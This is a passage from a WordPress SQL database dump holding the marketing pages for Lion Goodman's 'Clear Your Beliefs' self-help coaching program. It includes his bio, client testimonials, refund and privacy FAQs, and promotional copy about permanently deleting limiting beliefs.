Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-07 14:57:11', '2015-07-07 19:57:11', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2221, 2, '2015-07-08 00:37:06', '2015-07-08 05:37:06', '', 'v-shadow-2', '', 'inherit', 'open', 'open', '', 'v-shadow-2-2', '', '', '2015-07-08 00:37:06', '2015-07-08 05:37:06', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2015/07/v-shadow-2.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2223, 2, '2015-07-08 09:13:36', '2015-07-08 14:13:36', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" /></a></p>\n<p><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, 